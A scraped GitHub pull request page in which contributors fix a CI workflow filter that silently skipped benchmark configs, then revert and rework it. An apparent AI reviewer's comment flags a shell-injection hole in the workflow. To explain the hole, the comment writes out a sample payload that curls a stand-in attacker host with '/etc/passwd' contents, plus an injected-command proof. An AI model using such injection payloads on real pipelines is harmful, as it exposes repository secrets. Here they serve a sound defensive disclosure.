Fix e2e-tests dropping highest concurrency benchmark configs by Ankur-singh · Pull Request #1020 · SemiAnalysisAI/InferenceX

Ankur-singh · 2026-04-10T06:27:20Z

Problem

The e2e-tests.yml workflow silently drops benchmark runs for the highest and median concurrency configs on 8k1k sequence lengths.

Root cause

mark_eval_entries() marks selected entries (highest + median conc for 8k1k) with run-eval=True. The SINGLE job filter then excludes these entries:

# Old filter — excludes run-eval=True from benchmarks
SINGLE = [x for x in d if 'prefill' not in x and not x.get('run-eval', False)]

These excluded configs only appear in the EVALS job, which runs with eval-only: true — meaning no throughput benchmark is ever executed for them.

How run-sweep handles this differently

run-sweep.yml uses process_changelog.py which calls generate_sweep_configs.py test-config with --no-evals for benchmarks and --evals-only for evals in separate passes. This means ALL concurrency values are always benchmarked, and evals are generated independently.

In contrast, e2e-tests.yml generates everything in one pass and then splits — causing the eval-marked entries to be carved out of the benchmark list entirely.

Impact

Across all NVIDIA + AMD configs, 172 benchmark configs were being silently skipped. For example, with minimaxm2.5-fp8-b200-vllm, these 8k1k configs were never benchmarked:

tp=2 conc=64 (median)
tp=2 conc=512 (highest)
tp=4 conc=64 (median)
tp=4 conc=512 (highest)

Fix

Remove the run-eval filter from the SINGLE config generation. Since benchmark and eval jobs are separate (SINGLE hardcodes run-eval: false, EVALS hardcodes run-eval: true + eval-only: true), there is no need to exclude eval-marked entries from benchmarks:

# New filter — all single-node configs are benchmarked
SINGLE = [x for x in d if 'prefill' not in x]

Eval-marked entries now run both benchmark (via SINGLE) and eval (via EVALS), which is the correct behavior.

Remove run-eval filter from SINGLE job config generation so all single-node configs are benchmarked regardless of eval marking.

Oseltamivir · 2026-04-10T06:33:02Z

@Ankur-singh Thanks for the catch, having look rn. Will patch ASAP if indeed broken

claude

LGTM — the one-line fix correctly removes the erroneous exclusion from SINGLE, since that job already hardcodes downstream.

Extended reasoning...

Overview

This PR modifies a single line in , removing the predicate from the SINGLE config filter. No other files are touched.

Security risks

The pre-existing unquoted expression interpolation on lines 55-56 (flagged as an inline comment) is a legitimate injection risk but predates this PR entirely. The one-line change introduced here does not add or worsen any security surface.

Level of scrutiny

This is a low-risk, mechanical fix to a CI workflow filter. The logic is self-evident: SINGLE already passes to the benchmark template unconditionally, so filtering out eval-marked entries beforehand was a bug causing 172 configs to be silently skipped. Removing the filter restores the intended behavior.

Other factors

The description provides a clear root-cause analysis and contrasts the fix with how handles the same split correctly. No ambiguity in the intent or implementation.

claude · 2026-04-10T06:34:56Z

                  pip install pydantic
                  CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py \
                    ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }})
-                  SINGLE=$(echo "$CONFIG_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(json.dumps([x for x in d if 'prefill' not in x and not x.get('run-eval', False)]))")
+                  SINGLE=$(echo "$CONFIG_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(json.dumps([x for x in d if 'prefill' not in x]))")


🟣 The generate-cli-command input is interpolated directly into the shell command on line 56 without quoting, allowing shell metacharacters in the input to inject arbitrary commands. This is a pre-existing issue unrelated to this PR's change; the fix is to quote the expression: "${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}", or assign it to an environment variable first.

Extended reasoning...

What the bug is and how it manifests

In GitHub Actions, expressions like ${{ inputs.foo }} inside a run: block are string-substituted directly into the shell script text before the shell interprets it. This means if inputs.generate-cli-command contains shell metacharacters — semicolons, backticks, $(...), newlines, etc. — they become part of the raw shell script and execute as commands.

The specific code path that triggers it

Lines 55-56 of .github/workflows/e2e-tests.yml:

CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py \ ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }})

The ${{ ... }} expression is unquoted, so its text lands verbatim in the shell script.

Why existing code does not prevent it

There is no input sanitization or validation on generate-cli-command in the workflow definition. The input is declared as a plain type: string with no restrictions. GitHub Actions does not sanitize expression output in run: contexts — it only sanitizes values when they are passed via env: variables (where the shell never sees the raw substitution).

What the impact would be

A crafted input like --flag; curl https://attacker.example/exfil?$(cat /etc/passwd) # would cause the runner to execute the exfiltration command in the CI environment, which has access to repository secrets (e.g., REPO_PAT). GitHub's own security hardening guide explicitly calls this pattern out as a critical injection risk.

How to fix it

Assign the expression to an environment variable and reference the variable in the shell command:

env: GENERATE_CLI_CMD: ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }} run: | CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py $GENERATE_CLI_CMD)

Or, at minimum, add double quotes: "${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}" (which protects against word-splitting and some metacharacters but is not as robust as the env-var approach).

Step-by-step proof

A user with repo write access triggers the workflow with: generate-cli-command = '--config foo; echo INJECTED > /tmp/pwned'

GitHub Actions substitutes the expression, producing the shell script line: CONFIG_JSON=$(python3 .../generate_sweep_configs.py --config foo; echo INJECTED > /tmp/pwned)

The shell sees two commands separated by ;: the python3 invocation, then echo INJECTED > /tmp/pwned.

Both execute; the injection succeeds.

Pre-existing status

This vulnerability predates this PR. The PR only modifies line 57 (removing the run-eval filter from SINGLE), while the vulnerable interpolation is on lines 55-56 and was not changed. It is flagged here because the PR touches the same run: block, making this a natural point to note the issue.

Oseltamivir · 2026-04-10T07:00:15Z

@Ankur-singh

Thanks for catch once again. That was added because --evals-only causes mark_eval_entries() line 936 to filter to only eval-marked entries. CONFIG_JSON contains only entries with run-eval=True but SINGLE: all non-prefill entries → runs benchmarks for them (run-eval hardcoded false) EVALS: same entries → runs evals. This is wrong as --evals-only should skip benchmarks, but now they run too.

The intention is:

Flags	mark_eval_entries() runs?	Effect
Default (no flags)	Yes	Both evals and throughput should run. This SHOULD happen during `perf-changelog`. Bug that this PR fixes: eval-marked 8k1k configs are excluded from SINGLE and only appear in EVALS with eval-only: true. No throughput benchmark for them.
--no-evals	No	No entries get run-eval=True, so the SINGLE filter drops nothing. All configs are benchmarked. No evals run.
--evals-only	Yes	Entries without run-eval=True are filtered out entirely (line 936). Only eval-marked configs survive, and they land in EVALS with eval-only: true. Benchmark-only configs SHOULD be discarded Bug that this introduces and that line intended to fix: SINGLE: all non-prefill entries → runs benchmarks for them even though `--evals-only` should skip benchmarks

In default mode, the old filter not x.get('run-eval', False) excluded eval-marked entries from SINGLE. The new logic checks whether all non-prefill entries are eval-marked. In default mode they aren't (only highest/median concurrency 8k1k configs are marked), so all(...) is False and SINGLE includes everything, fixing the original bug.

In --evals-only mode, generate_sweep_configs.py filters to only eval-marked entries, so every non-prefill entry has run-eval=True. all(...) is True, SINGLE becomes [], and no benchmarks run, preserving the intended behavior and preventing the regression.

Quick test:

python3 -c "
import json

def pr_fix_no_guard(d):
    return [x for x in d if 'prefill' not in x]

def our_fix(d):
    s = [x for x in d if 'prefill' not in x]
    return [] if s and all(x.get('run-eval', False) for x in s) else s

def original(d):
    return [x for x in d if 'prefill' not in x and not x.get('run-eval', False)]

evals_only_data = [
    {'name': 'c', 'conc': 256, 'run-eval': True},
    {'name': 'd', 'conc': 512, 'run-eval': True},
]

default_data = [
    {'name': 'a', 'conc': 64},
    {'name': 'b', 'conc': 128},
    {'name': 'c', 'conc': 256, 'run-eval': True},
    {'name': 'd', 'conc': 512, 'run-eval': True},
]

print('=== --evals-only mode (expect SINGLE=0, no benchmarks) ===')
print(f'  main (original):      SINGLE={len(original(evals_only_data))} entries')
print(f'  PR fix (no guard):    SINGLE={len(pr_fix_no_guard(evals_only_data))} entries  <-- REGRESSION: benchmarks run')
print(f'  Our fix (with guard): SINGLE={len(our_fix(evals_only_data))} entries')
print()
print('=== Default mode (expect SINGLE=4, all configs benchmarked) ===')
print(f'  main (original):      SINGLE={len(original(default_data))} entries  <-- BUG: eval-marked configs dropped') 
print(f'  PR fix (no guard):    SINGLE={len(pr_fix_no_guard(default_data))} entries')
print(f'  Our fix (with guard): SINGLE={len(our_fix(default_data))} entries')
"

Output:

=== --evals-only mode (expect SINGLE=0, no benchmarks) ===
  main (original):      SINGLE=0 entries
  PR fix (no guard):    SINGLE=2 entries  <-- REGRESSION: benchmarks run
  Our fix (with guard): SINGLE=0 entries

=== Default mode (expect SINGLE=4, all configs benchmarked) ===
  main (original):      SINGLE=2 entries  <-- BUG: eval-marked configs dropped
  PR fix (no guard):    SINGLE=4 entries
  Our fix (with guard): SINGLE=4 entries

Ankur-singh · 2026-04-10T07:15:23Z

@Oseltamivir that makes sense. tysm!

Oseltamivir · 2026-04-10T07:23:38Z

@Ankur-singh Lol my fix has another bug where it fails when a config has only 8k1k with a single concurrency value, because mark_eval_entries marks every entry, making it indistinguishable from --evals-only mode.

I'll just stamp EVAL_ONLY and make the tests more stringent

Oseltamivir

lgtm

Oseltamivir · 2026-04-10T07:25:31Z

@Ankur-singh I'll merge this in tmr morning after looking at it again when I'm combobulated. Please help me to look through it one more time too.

Thanks so much 🙏🫡

…1020)" This reverts commit 68bf34d.

Ankur-singh · 2026-04-10T07:27:04Z

Sorry about that 🫣
Please revert!

Oseltamivir · 2026-04-10T07:35:12Z

Lol it's fine, probably good now with stamp of EVAL_ONLY, but will still have a look tmr and PR if smt wrong again

Ankur-singh · 2026-04-10T07:37:10Z

We are in this together 😂🤞

…, SemiAnalysisAI#1020)

Fix e2e-tests missing highest concurrency benchmark configs

1977efd

Remove run-eval filter from SINGLE job config generation so all single-node configs are benchmarked regardless of eval marking.

github-project-automation bot added this to InferenceMAX Board Apr 10, 2026

Ankur-singh requested a review from a team April 10, 2026 06:27

claude bot reviewed Apr 10, 2026

View reviewed changes

prevent regression

8acefd2

Fix leak + buff tests

012066f

Oseltamivir approved these changes Apr 10, 2026

View reviewed changes

Ankur-singh merged commit 68bf34d into main Apr 10, 2026
4 checks passed

Ankur-singh deleted the nv/fix-e2e-run-test-config-diff branch April 10, 2026 07:26

github-project-automation bot moved this to Done in InferenceMAX Board Apr 10, 2026

Ankur-singh added a commit that referenced this pull request Apr 10, 2026

Revert "Fix e2e-tests dropping highest concurrency benchmark configs (#…

a87926a

…1020)" This reverts commit 68bf34d.

Ankur-singh mentioned this pull request Apr 10, 2026

Revert "Fix e2e-tests dropping highest concurrency benchmark configs" #1021

Closed

JohnQinAMD pushed a commit to JohnQinAMD/InferenceX that referenced this pull request Apr 11, 2026

Merge SemiAnalysis history through 475cc1d (exclude SemiAnalysisAI#1006…

75d3aed

…, SemiAnalysisAI#1020)

JohnQinAMD added a commit to JohnQinAMD/InferenceX that referenced this pull request Apr 11, 2026

Merge SemiAnalysis history through 475cc1d (exclude SemiAnalysisAI#1006…

f0a9b8c

…, SemiAnalysisAI#1020)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Fix e2e-tests dropping highest concurrency benchmark configs#1020

Fix e2e-tests dropping highest concurrency benchmark configs#1020
Ankur-singh merged 3 commits intomainfrom
nv/fix-e2e-run-test-config-diff

Ankur-singh commented Apr 10, 2026

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

claude bot left a comment

Uh oh!

claude bot Apr 10, 2026

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

Ankur-singh commented Apr 10, 2026

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

Oseltamivir left a comment

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

Uh oh!

Ankur-singh commented Apr 10, 2026 •

edited

Loading

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

Ankur-singh commented Apr 10, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

Ankur-singh commented Apr 10, 2026

Problem

Root cause

How run-sweep handles this differently

Impact

Fix

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

claude bot left a comment

Choose a reason for hiding this comment

Overview

Security risks

Level of scrutiny

Other factors

Uh oh!

claude bot Apr 10, 2026

Choose a reason for hiding this comment

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

Ankur-singh commented Apr 10, 2026

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

Oseltamivir left a comment

Choose a reason for hiding this comment

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

Uh oh!

Ankur-singh commented Apr 10, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

Oseltamivir commented Apr 10, 2026

Uh oh!

Ankur-singh commented Apr 10, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Ankur-singh commented Apr 10, 2026 •

edited

Loading